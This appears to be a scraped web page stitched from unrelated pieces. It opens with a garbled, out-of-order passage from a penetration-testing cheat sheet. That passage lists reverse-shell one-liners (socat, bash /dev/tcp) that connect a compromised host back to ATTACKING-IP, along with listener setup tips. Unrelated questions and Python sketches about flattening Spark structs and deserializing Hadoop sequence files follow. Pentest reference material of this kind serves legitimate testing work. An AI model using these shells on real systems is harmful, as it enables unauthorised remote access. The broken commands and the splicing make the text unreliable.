

The following shells exist within Kali Linux under /usr/share/webshells/. These are only useful if you are able to upload, inject or transfer the shell to the machine.

Source:

socat tcp:ip:port exec:'bash -i',pty,stderr,setsid,sigint,sane &

Golang Reverse Shell

echo ' package main import "os/exec" import "net" func main ()'

#!/usr/bin/gawk -f





Bash Reverse Shells

exec /bin/bash 0&0 2>&0

0/dev/tcp/ATTACKING-IP/80 sh &196 2>&196

exec 5/dev/tcp/ATTACKING-IP/80 cat &5 >&5 done # or: while read line 0&5 >&5 done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

socat Reverse Shell

Using socat we can create a relay for us to send a reverse shell back to our attacking machine.

If your attacking machine is behind a NAT router, you'll need to set up a port forward to the attacking machine's IP / port.

ATTACKING-IP is the machine running your listening netcat session; port 80 is used in all examples below (for reasons mentioned above). For example, to proxy netcat through a proxy, you could use the command.

Your remote shell will need a listening netcat instance in order to connect back. A simple way to do this is using a cloud instance / VPS. Linode is a good choice as they give you a direct public IP, so there are no NAT issues to worry about or debug.

Updated to add the reverse shells submitted via Twitter - Original post date

Setup Listening Netcat

If you found this resource useful you should also check out our penetration testing tools cheat sheet, which has some additional reverse shells and other commands useful when performing penetration testing. At the bottom of the post is a collection of uploadable reverse shells, present in Kali Linux.

I'm very new to Spark; every comment will help, thanks.

During penetration testing, if you're lucky enough to find a remote command execution vulnerability, you'll more often than not want to connect back to your attacking machine to leverage an interactive shell.

Below is a collection of reverse shells that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc).

My goal is to put each of the objects inside images in its own row with separate columns. For example, "Z4ah9SemQjX2cKN187pX" with its values (artist, created_at, ...) goes in the first row, "Z552dVXF5vp80bAajYrn" in the second row, and so on.
    | |- Z4ah9SemQjX2cKN187pX: struct (nullable = true)
    | | |- created_at: long (nullable = true)
    | | |- description: string (nullable = true)
    | | |- download_url: string (nullable = true)
    | | |- file_name: string (nullable = true)
    | | |- key_words: array (nullable = true)
    | | | |- element: string (containsNull = true)
    | |- Z552dVXF5vp80bAajYrn: struct (nullable = true)
    | |- Z598cIDb79GPrC6VXbTb: struct (nullable = true)
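The reshaping asked for here (one row per key under images, with that key's fields as columns) can be illustrated in plain Python. This is only a sketch of the target shape, not Spark code: the function name `images_to_rows`, the `image_id` column, and every sample value are hypothetical, while the field names come from the schema and the description in the question.

```python
from typing import Any, Dict, List


def images_to_rows(record: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Turn {"images": {id: {field: value}}} into one flat dict per image id."""
    rows: List[Dict[str, Any]] = []
    for image_id, fields in (record.get("images") or {}).items():
        row: Dict[str, Any] = {"image_id": image_id}  # hypothetical column name
        row.update(fields or {})  # a nullable struct may be None
        rows.append(row)
    return rows


# Hypothetical sample shaped like the schema in the question.
sample = {
    "images": {
        "Z4ah9SemQjX2cKN187pX": {
            "artist": "someone",
            "created_at": 1600000000,
            "key_words": ["a", "b"],
        },
        "Z552dVXF5vp80bAajYrn": {
            "artist": "someone else",
            "created_at": 1600000001,
            "key_words": [],
        },
    }
}

rows = images_to_rows(sample)
for row in rows:
    print(row)
```

Each resulting dict corresponds to one row, keyed by the image id. The same idea would still need to be expressed with DataFrame operations to run on a cluster.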

A row with abcd4 in s should simply get inserted into d.

Is there any way in Python to take this bytes-like NullWritable object and deserialize it into either a Python dictionary, or put it back into Hadoop as something that I could actually read? What I need to be able to do is deserialize this in memory so that I can write it as a JSON file.


Liam385 Asks: Deserialize an in-memory Hadoop sequence file object

PySpark has a function sequenceFile that allows us to read a sequence file which is stored in HDFS or some local path available to all nodes.

However, what if I already have a bytes object in the driver memory that I need to deserialize and write as a sequence file?

For example, the application that I am working with produces this output as a Python bytes object, which seems to just contain a serialized Sequence object which should be able to be deserialized in-memory.

Because this object is already in memory (for reasons I cannot control), the only way I have currently is to write it as a file locally, move that file into HDFS, then read the file using the sequenceFile method (since that method only works with a file that is on an HDFS file path or a local path on every node).
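As a starting point for inspecting such a bytes object without touching HDFS, the header can be read directly from memory. The sketch below assumes the version 6 SequenceFile header layout as I understand it (magic `SEQ`, version byte, key and value class names, two compression flags, optional codec name, metadata pairs, 16-byte sync marker); this should be checked against the Hadoop documentation before relying on it. It does not decode records, since that depends on the key and value Writable classes. The names `read_vint`, `read_text`, and `parse_sequence_file_header` are hypothetical helpers, not part of PySpark or Hadoop.

```python
import io
import struct
from typing import BinaryIO, Dict, Optional


def read_vint(stream: BinaryIO) -> int:
    """Decode a Hadoop-style variable-length integer (assumed encoding)."""
    first = struct.unpack("b", stream.read(1))[0]  # signed byte
    if first >= -112:
        return first  # small values are stored in a single byte
    negative = first < -120
    size = (-119 - first) if negative else (-111 - first)  # includes first byte
    value = 0
    for byte in stream.read(size - 1):
        value = (value << 8) | byte
    return ~value if negative else value


def read_text(stream: BinaryIO) -> str:
    """Read a length-prefixed UTF-8 string."""
    length = read_vint(stream)
    return stream.read(length).decode("utf-8")


def parse_sequence_file_header(data: bytes) -> Dict[str, object]:
    """Parse only the header of an in-memory SequenceFile (version 6 assumed)."""
    stream = io.BytesIO(data)
    if stream.read(3) != b"SEQ":
        raise ValueError("not a SequenceFile: missing SEQ magic")
    version = stream.read(1)[0]
    key_class = read_text(stream)
    value_class = read_text(stream)
    compressed = stream.read(1) != b"\x00"
    block_compressed = stream.read(1) != b"\x00"
    codec: Optional[str] = read_text(stream) if compressed else None
    (meta_count,) = struct.unpack(">i", stream.read(4))
    metadata = {}
    for _ in range(meta_count):
        meta_key = read_text(stream)
        metadata[meta_key] = read_text(stream)
    sync = stream.read(16)
    return {
        "version": version,
        "key_class": key_class,
        "value_class": value_class,
        "compressed": compressed,
        "block_compressed": block_compressed,
        "codec": codec,
        "metadata": metadata,
        "sync": sync,
        "records_offset": stream.tell(),  # where record data would begin
    }


def _text(value: str) -> bytes:
    """Encode a short string (under 128 bytes) the way the parser expects."""
    raw = value.encode("utf-8")
    return bytes([len(raw)]) + raw


# Synthetic header built by hand for illustration, not real application output.
header = (
    b"SEQ\x06"
    + _text("org.apache.hadoop.io.NullWritable")
    + _text("org.apache.hadoop.io.BytesWritable")
    + b"\x00\x00"             # not compressed, not block compressed
    + struct.pack(">i", 0)    # no metadata entries
    + bytes(16)               # placeholder sync marker
)
info = parse_sequence_file_header(header)
print(info["key_class"], info["value_class"], info["records_offset"])
```

Knowing the key and value class names is usually the first step toward deciding how the record payloads themselves could be decoded and written out as JSON.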